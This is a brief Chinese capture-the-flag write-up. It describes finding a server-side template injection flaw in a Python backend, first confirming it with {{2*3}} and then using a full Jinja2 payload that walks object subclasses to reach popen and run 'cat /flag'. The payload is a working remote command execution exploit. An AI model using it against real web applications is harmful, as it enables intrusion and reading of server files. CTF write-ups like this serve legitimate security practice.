一个....池子?
2026/2/3
响应标头显示这是一个python写的后端,可能存在ssti漏洞,提交{{2*3}}返回6证明存在ssti漏洞尝试得到flag
{{''.__class__.__base__.__subclasses__()[137].__init__.__globals__['popen']("cat /flag").read()}}
成功得到flag